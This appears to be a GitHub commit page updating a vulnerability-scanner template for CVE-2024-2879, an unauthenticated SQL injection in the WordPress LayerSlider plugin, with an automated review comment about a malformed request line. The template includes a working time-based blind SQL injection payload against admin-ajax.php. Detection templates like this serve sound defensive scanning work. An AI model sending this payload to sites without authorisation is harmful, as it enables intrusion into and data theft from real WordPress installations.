Update CVE-2024-2879.yaml

patch-1
Ritik Chaddha 2024-04-09 15:10:11 +05:30 committed by GitHub
parent 013dfff19e
commit d4f7430e62
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 12 additions and 7 deletions


@ -1,7 +1,7 @@
id: CVE-2024-2879
info:
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 Unauthenticated SQL Injection
name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection
author: d4ly
severity: critical
description: |
@ -22,7 +22,7 @@ info:
epss-percentile: 0.07687
metadata:
verified: true
max-request: 1
max-request: 2
publicwww-query: "/wp-content/plugins/LayerSlider/"
tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli
@ -32,18 +32,23 @@ http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/LayerSlider/assets/static/public/front.css"
matchers:
- type: word
internal: true
words:
- ".ls-clearfix:before"
internal: true
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))x)--+x)"
- raw:
- |
@timeout: 10s
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))x)--+x) HTTP/1.1'
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=5
- duration>=6
- status_code == 200
- contains(body, "<script>")
condition: and
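Review bot: The request line of the SLEEP(6) probe in the `raw:` block ends in `HTTP/1.1'`, and that trailing single quote makes the request line malformed. A strict server or intermediary proxy may answer with a 400 instead of reaching `admin-ajax.php`, in which case the `status_code == 200` matcher fails and a vulnerable host is reported as clean; the line should end `--+x) HTTP/1.1`. The added and removed markers are lost on this page, so this assumes the `raw:` block is the new side, which the paired `max-request: 2` and `duration>=6` lines suggest. It would also help to add a comment above the matchers such as `# SLEEP(6) with @timeout: 10s leaves 4s headroom; a slow host can still satisfy duration>=6, so the 200 and "<script>" checks must stay`, so that a later edit does not loosen the false-positive guard.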